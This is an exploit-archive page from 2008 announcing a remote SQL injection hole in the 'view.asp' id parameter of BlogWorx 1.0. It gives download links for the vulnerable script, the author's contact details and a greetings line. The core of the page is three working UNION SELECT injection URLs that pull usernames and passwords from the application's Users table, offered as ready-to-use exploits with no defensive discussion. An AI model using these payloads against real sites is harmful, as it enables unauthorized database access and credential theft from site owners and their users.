[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BlogWorx 1.0 (view.asp id) Remote SQL Injection Vulnerability
# Published : 2008-04-21
# Author : U238
# Previous Title : Wordpress Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability
# Next Title : Crazy Goomba 1.2.1 (id) Remote SQL Injection Vulnerability
BlogWorx 'view.asp' Multiple SQL Injection Vulnerability
Discovered By : U238
WebPage : http://noexec.blogspot.com
mail : setuid.noexec0x1[a.q]hotmail[d0t].com
Script : http://devworx.somee.com/projects/project.asp?pid=20
Script (alternativ) : http://www.codedworld.com/download/blogworx/74764.html
Exploits >>
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
http://www.example.com/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users
: The_BekiR - fahn - ka0x - xarnux - Ruslan - Tevfik Cevik - Ferruh Mavituna - nettoxic - sersak :
# www.Syue.com [2008-04-21]